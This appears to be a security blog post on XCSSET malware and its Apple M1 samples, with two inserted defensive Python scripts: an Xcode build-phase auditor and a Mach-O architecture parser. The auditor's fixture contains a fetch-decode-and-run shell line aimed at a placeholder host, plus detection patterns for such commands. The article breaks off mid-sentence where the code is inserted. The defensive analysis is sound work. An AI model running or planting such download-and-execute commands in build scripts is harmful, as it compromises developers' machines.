Good old malware for the new Apple Silicon platform

Introduction


A short while ago, Apple released Mac computers with the new chip called Apple M1. The unexpected release was a milestone in the Apple hardware industry. However, as technology evolves, we also observe a growing interest in the newly released platform from malware adversaries. This inevitably leads us to new malware samples compiled for the Apple Silicon platform. In this article, we are going to take a look at threats for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q. section at the end of the article for those who want to understand better the security risks of M1 malware. Let’s dive in.


XCSSET malware


Last year, a threat called XCSSET was discovered for the first time. It targets mainly Mac developers using a unique way of distribution: injecting a malicious payload into Xcode IDE projects on the victim’s Mac. This payload will be executed at the time of building project files in Xcode. XCSSET modules have numerous capabilities, such as:


Reading and dumping Safari cookies,
Injecting malicious JavaScript code into various websites,
Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.,
Encrypting user files.

All these various features, in combination with high stealth and an unusual way of distribution, make XCSSET a dangerous threat for Mac computers.
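The build-time execution described above is the part of XCSSET's distribution that a developer can audit on their own machine. The script below is an added example, not code from the article or from Kaspersky: it assumes that an injected payload could sit in a Run Script build phase (a `PBXShellScriptBuildPhase` object in the project's `project.pbxproj`), pulls out every such script, and flags download-and-execute patterns for manual review. The sample project text, the object ids `AA01`/`AA02`, and the host name are constructed placeholders.

```python
import re

# Constructed excerpt of an Xcode project.pbxproj (not a real project): one
# ordinary lint phase and one phase that fetches, decodes and runs remote content.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Lint";
			shellPath = /bin/sh;
			shellScript = "echo \"running swiftlint\"\nswiftlint lint --quiet\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			shellPath = /bin/sh;
			shellScript = "curl -s https://placeholder.invalid/s | base64 -d | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One pbxproj object: "<id> /* comment */ = { isa = PBXShellScriptBuildPhase; ... };"
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-Fa-f]+)\s*(?:/\*.*?\*/)?\s*=\s*\{\s*'
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};',
    re.DOTALL)
# The script is a quoted string with backslash escapes (\n, \", \\).
SCRIPT_RE = re.compile(r'shellScript = "(?P<script>(?:[^"\\]|\\.)*)";', re.DOTALL)
NAME_RE = re.compile(r'name = "?([^";]+)"?;')

# Patterns worth a human look in a build script (review heuristics, not proof of compromise).
INDICATORS = [
    (r'\bcurl\b|\bwget\b', 'downloads remote content'),
    (r'base64\s+(-d|--decode|-D)', 'decodes base64 payload'),
    (r'\|\s*(sh|bash|zsh|python3?|osascript)\b', 'pipes data into an interpreter'),
    (r'\beval\b', 'uses eval'),
    (r'\bosascript\b', 'runs AppleScript'),
]


def _unescape(s):
    """Undo pbxproj string escaping so the script reads as it will execute."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def find_script_phases(pbxproj_text):
    """Return every Run Script build phase as {'id', 'name', 'script'}."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        sm = SCRIPT_RE.search(m.group('body'))
        if not sm:
            continue
        nm = NAME_RE.search(m.group('body'))
        phases.append({'id': m.group('id'),
                       'name': nm.group(1) if nm else '',
                       'script': _unescape(sm.group('script'))})
    return phases


def review_phases(phases):
    """Attach the list of matched indicators to each phase."""
    return [dict(p, indicators=[label for pat, label in INDICATORS
                                if re.search(pat, p['script'])])
            for p in phases]


def suspicious_phases(pbxproj_text):
    """Phases that hit at least one indicator; these are the ones to read by hand."""
    return [f for f in review_phases(find_script_phases(pbxproj_text)) if f['indicators']]


if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for f in suspicious_phases(text):
        print(f"{f['id']} {f['name'] or '(unnamed)'}: {', '.join(f['indicators'])}")
        print('    ' + f['script'].strip().replace('\n', '\n    '))
```

Run it as `python3 audit_phases.py MyApp.xcodeproj/project.pbxproj` before building a project you did not write yourself. A clean report only covers this one injection point, so treat it as one check among several rather than a verdict on the project.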


While exploring the various executable modules of XCSSET, we found out that some of them also contained samples compiled specially for new Apple Silicon chips. For example, a sample with the MD5 hash sum
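Whether a sample was compiled for Apple Silicon at all is visible in the Mach-O header before any disassembly: a universal binary starts with a big-endian fat header listing one slice per architecture, and a thin x86_64 or arm64 binary carries its CPU type in its own little-endian header. The parser below is an added example, not code from the article or from Kaspersky; `build_fat` and `thin_header` only assemble header-only fixtures so the check can run offline, and the slice-count ceiling is a heuristic of this example, chosen because Java class files share the `0xCAFEBABE` magic.

```python
import struct

# Constants from <mach-o/fat.h>, <mach-o/loader.h> and <mach/machine.h>
FAT_MAGIC = 0xCAFEBABE          # universal binary header, always big-endian
MH_MAGIC_64 = 0xFEEDFACF        # 64-bit thin header, stored in the target's byte order
MH_MAGIC = 0xFEEDFACE           # 32-bit thin header
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {0x7: 'i386', CPU_TYPE_X86_64: 'x86_64', 0xC: 'arm', CPU_TYPE_ARM64: 'arm64'}

FAT_ARCH_SIZE = 20              # struct fat_arch: cputype, cpusubtype, offset, size, align
MAX_SANE_SLICES = 32            # heuristic: a Java class file has its version number here


def architectures(data: bytes) -> list:
    """Return the CPU architectures contained in a Mach-O file, thin or universal."""
    if len(data) < 8:
        raise ValueError('too short to be a Mach-O file')
    magic_be, second_be = struct.unpack('>II', data[:8])
    if magic_be == FAT_MAGIC:
        nfat = second_be
        if nfat == 0 or nfat > MAX_SANE_SLICES:
            raise ValueError(f'implausible slice count {nfat}; not a universal binary?')
        if len(data) < 8 + FAT_ARCH_SIZE * nfat:
            raise ValueError('fat header truncated')
        archs = []
        for i in range(nfat):
            off = 8 + i * FAT_ARCH_SIZE
            cputype, _sub, offset, size, _align = struct.unpack(
                '>IIIII', data[off:off + FAT_ARCH_SIZE])
            name = CPU_NAMES.get(cputype, hex(cputype))
            # A slice that points past the end of the file is a corrupt or truncated sample.
            if offset + size > len(data):
                raise ValueError(f'slice {i} ({name}) extends past end of file')
            archs.append(name)
        return archs
    # Thin x86_64 / arm64 Mach-O: header fields are little-endian
    magic_le, cputype = struct.unpack('<II', data[:8])
    if magic_le in (MH_MAGIC_64, MH_MAGIC):
        return [CPU_NAMES.get(cputype, hex(cputype))]
    raise ValueError('not a Mach-O file')


def has_arm64(data: bytes) -> bool:
    """True if the file can run natively on Apple Silicon (arm64 slice or arm64 thin binary)."""
    return 'arm64' in architectures(data)


# --- constructed fixtures, used only to exercise the parser -------------------

def thin_header(cputype: int) -> bytes:
    """Minimal mach_header_64 (little-endian), filetype MH_EXECUTE = 2, no load commands."""
    return struct.pack('<IIIIIIII', MH_MAGIC_64, cputype, 0, 2, 0, 0, 0, 0)


def build_fat(cputypes) -> bytes:
    """Assemble a universal binary from header-only slices placed back to back."""
    header_size = 8 + FAT_ARCH_SIZE * len(cputypes)
    slices = [thin_header(ct) for ct in cputypes]
    table, body, offset = b'', b'', header_size
    for ct, sl in zip(cputypes, slices):
        table += struct.pack('>IIIII', ct, 0, offset, len(sl), 0)
        body += sl
        offset += len(sl)
    return struct.pack('>II', FAT_MAGIC, len(cputypes)) + table + body


if __name__ == '__main__':
    import sys
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 \
        else build_fat([CPU_TYPE_X86_64, CPU_TYPE_ARM64])
    print('architectures:', ', '.join(architectures(data)))
    print('runs natively on Apple Silicon:', has_arm64(data))
```

On a Mac the same answer comes from `lipo -archs <file>` or `file <file>`; the value of a parser like this one is that it runs anywhere, for instance inside a triage pipeline on Linux, and fails loudly on a truncated or non-Mach-O input instead of guessing.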